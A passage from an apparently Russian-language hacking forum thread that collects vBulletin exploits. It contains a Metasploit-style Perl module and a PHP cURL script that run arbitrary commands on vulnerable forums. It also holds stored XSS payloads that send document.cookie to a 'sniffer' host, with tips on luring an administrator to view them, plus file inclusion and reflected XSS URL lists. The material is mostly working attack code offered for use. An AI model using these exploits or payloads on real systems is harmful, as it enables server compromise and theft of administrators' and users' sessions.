            'Priv'     => 0,
            'UserOpts' =>
              {
                    'RHOST' => [1, 'ADDR', 'The target address'],
                    'RPORT' => [1, 'PORT', 'The target port', 80],
                    'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
                    'RPATH' => [1, 'DATA', 'Path to the misc.php script', '/forum/misc.php'],
                    'SSL'   => [0, 'BOOL', 'Use SSL'],
              },
    
            'Description' => Pex::Text::Freeform(qq{
                    This module exploits a code execution flaw in vBulletin <= 3.0.6.
    }),
    
            'Refs' =>
              [
                    ['MIL', '832'],
              ],
    
            'Payload' =>
              {
                    'Space' => 512,
                    'Keys'  => ['cmd', 'cmd_bash'],
              },
    
            'Keys' => ['vBulletin'],
      };
    
    sub new {
            my $class = shift;
            my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
            return($self);
    }
    
    sub Exploit {
            my $self = shift;
            my $target_host    = $self->GetVar('RHOST');
            my $target_port    = $self->GetVar('RPORT');
            my $vhost          = $self->GetVar('VHOST') || $target_host;
            my $path           = $self->GetVar('RPATH');
            my $cmd            = $self->GetVar('EncodedPayload')->RawPayload;
    
            # Encode the command as a set of chr() function calls
            my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
    
            # Create the get request data
            my $data = "?do=page&template={\${passthru($byte)}}";
    
            my $req =
                    "GET $path$data HTTP/1.1\r\n".
                    "Host: $vhost:$target_port\r\n".
                    "Content-Type: application/html\r\n".
                    "Content-Length: ". length($data)."\r\n".
                    "Connection: Close\r\n".
                    "\r\n";
    
            my $s = Msf::Socket::Tcp->new(
                    'PeerAddr'  => $target_host,
                    'PeerPort'  => $target_port,
                    'LocalPort' => $self->GetVar('CPORT'),
                    'SSL'       => $self->GetVar('SSL'),
              );
    
            if ($s->IsError){
                    $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
                    return;
            }
    
            $self->PrintLine("[*] Sending the malicious vBulletin Get request...");
    
            $s->Send($req);
    
            my $results = $s->Recv(-1, 20);
            $s->Close();
    
            return;
    }
    
    1;
    vBulletin 3.0.4

    Execute command
    magic_quotes_gpc должен быть выключен

    PHP:
    <?php
    if (!(function_exists('curl_init'))) {
    echo 
    "cURL extension required\n";
    exit;
    }

    if (
    $argv[3]){
    $url $argv[1];
    $forumid intval($argv[2]);
    $command $argv[3];
    }
    else {
    echo 
    "vbulletin 3.0 > 3.0.4 execute command by AL3NDALEEB al3ndaleeb[at]uk2.net\n\n";
    echo 
    "Usage: ".$argv[0]." <url> <forumid> <command> [proxy]\n\n";
    echo 
    "<url> url to vbulletin site (ex: http://www.vbulletin.com/forum/)\n";
    echo 
    "<forumid> forum id\n";
    echo 
    "<command> command to execute on server (ex: 'ls -la')\n";
    echo 
    "[proxy] optional proxy url (ex: http://proxy.ksa.com.sa:8080)\n\n";
    echo 
    "ex :\n";
    echo 
    "\tphp vb30x.php http://www.vbulletin.com/forum/ 2 \"ls -al\"";

    exit;
    }

    if (
    $argv[4])
    $proxy $argv[4];



    $action 'forumdisplay.php?GLOBALS[]=1&f='.$forumid.'&comma=".`echo _START_`.`'.$command.'`.`echo _END_`."';

    $ch=curl_init();
    if (
    $proxy){
    curl_setopt($chCURLOPT_PROXY,$proxy);
    }
    curl_setopt($chCURLOPT_URL,$url.'/'.$action);
    curl_setopt($chCURLOPT_RETURNTRANSFER,1);
    $res=curl_exec ($ch);
    curl_close ($ch);
    $res substr($resstrpos($res'_START_')+7);
    $res substr($res,0strpos($res'_END_'));
    echo 
    $res;
    ?>
     
    #16 _GaLs_, 23 May 2007
    Last edited by a moderator: 23 May 2007
    2 people like this.
  17. Shram-spb

    Shram-spb Member

    Joined:
    6 Jun 2007
    Messages:
    64
    Likes Received:
    42
    Reputations:
    35
    узнать версию форума

    Вот что нашел.. Чтобы узнать версию форума.. иногда помогает..
    http://domain/forum/install/finalupgrade.php
    И видим версию форума :)
     
    #17 Shram-spb, 5 Jul 2007
    Last edited by a moderator: 3 Sep 2008
    1 person likes this.
  18. M0rgan

    M0rgan New Member

    Joined:
    4 Jul 2007
    Messages:
    25
    Likes Received:
    3
    Reputations:
    0
    Active XSS v3.6.8

    тут вроде бы не звучало еще 2 ХССки...
    не знаю точно в каких версиях но на 3.6.2 и 3.6.4 помоему работало...

    В первом случае надо быть модератором (иметь право банить) и надо чтоб на форуме при бане было поле "причина"
    вот само поле "причина" и есть уязвимым... ищем жертву для бана и в причине вписываем
    Code:
    Забанен за флуд <script>img = new Image(); img.src = "http://somesite.#ru/vash sniffer.jpg?"+document.cookie;</script> 
    теперь допустим хотим словить админа - скажите пусть зайдет посмотрит почему забанен пользователь или попросить разбанить из-за ошибки ( в общем придумать причину не тяжело) )

    Во втором случае надо иметь возможность менять себе "Особый статус" и поддержку хтмл...
    Code:
    Мой титул <script>img = new Image(); img.src = "http://somesite.#ru/vash sniffer.jpg?"+document.cookie;</script> 
    А там думаю загадочного нечего нету ))
    но это испытывал всего один раз... надо быть или знакомым админа или еще какието обстоятельство ))

    _На некоторых сайтах стоит фикс типа ограничения колиества символов в строке )

    --------------------------------------------------------------------


    Добавленно от BlackCats (фактически тоже самое инфа про версию другая):

    3.6.8 Patch.Level 1

    active xss:
    если вы модератор на форуме, то при бане в поле "причина бана" указываете ваш скрипт, и он сработает:
    при просмотре забаненых пользователей через:

    модпанель(например туда может зайти СуперМодератор)

    админ панель(админ)

    когда зайдёт юзер в свой акк(сам юзер)


    PHP:
    clientscript/ieprompt.html
    какойто недописанный скрипт.

    PHP:
    global.php или arhive/global.php
    в некоторых случаях
    раскрытие путей
     
    #18 M0rgan, 8 Jul 2007
    Last edited by a moderator: 3 Sep 2008
    2 people like this.
  19. gemaglabin

    gemaglabin Green member

    Joined:
    1 Aug 2006
    Messages:
    772
    Likes Received:
    842
    Reputations:
    1,369
    Active XSS in Tag [google] & [googlevideo]

    Активная xss в популярном теге для булки - google и googlevideo

    Code:
    [google*video][U*RL=/onmouseover=alert(1);a="]213[/U*RL][/google*video]123
    [google][U*RL=/onmouseover=alert(1);a="]213[/U*RL][/google]123
     
    #19 gemaglabin, 13 Jul 2007
    Last edited by a moderator: 3 Sep 2008
  20. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    Code Exec + Xss

    vBulletin v3.6.5
    Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

    Пример:
    [site]/vb/includes/functions.php?classfile=[Shell-Attack]
    [site]/vb/includes/functions_cron.php?nextitem=[Shell-Attack]
    [site]/vb/includes/functions_forumdisplay.php?specialtemplates=[Shell-Attack]


    vBulletin V3.6.8
    Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных во множестве сценариев множеством параметров. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

    Пример:
    [site]/[path]/faq.php?s=&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&match=
    all&titlesonly=0

    [site]/[path]/member.php?u=1=s'&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F
    script&match=all&titlesonly=1

    [site]/[path]/index.php?s=<script>alert('document.cookie')</script>

    [site]/[path]/faq.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript
    &match=all&titlesonly=0

    [site]/[path]/memberlist.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2
    Fscript&match=all&titlesonly=0

    [site]/[path]/calendar.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F
    script&match=all&titlesonly=0

    [site]/[path]/search.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript
    &match=all&titlesonly=0

    [site]/[path]/search.php?do=getdaily"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3
    Ealert%28document.cookie
    %29%3B%3C%2Fscript&match=all&titlesonly=0

    [site]/[path]/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript
    &match=all&titlesonly=0

    [site]/[path]/forumdisplay.php?do=markread"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3E
    alert%28document.cookie
    %29%3B%3C%2Fscript&match=all&titlesonly=0

    [site]/[path]/forumdisplay.php?f=1"&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie
    %29%3B%3C%2Fscript&match=all&titlesonly=0

    [site]/[path]/showgroups.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&
    match=all&titlesonly=0

    [site]/[path]/online.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript&
    match=all&titlesonly=0

    [site]/[path]/member.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F
    script&match=all&titlesonly=0

    [site]/[path]/sendmessage.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F
    script&match=all&titlesonly=0

    Источник www.securitysib.com
     
    #20 v1d0qz, 15 Aug 2007
    Last edited by a moderator: 3 Sep 2008
    1 person likes this.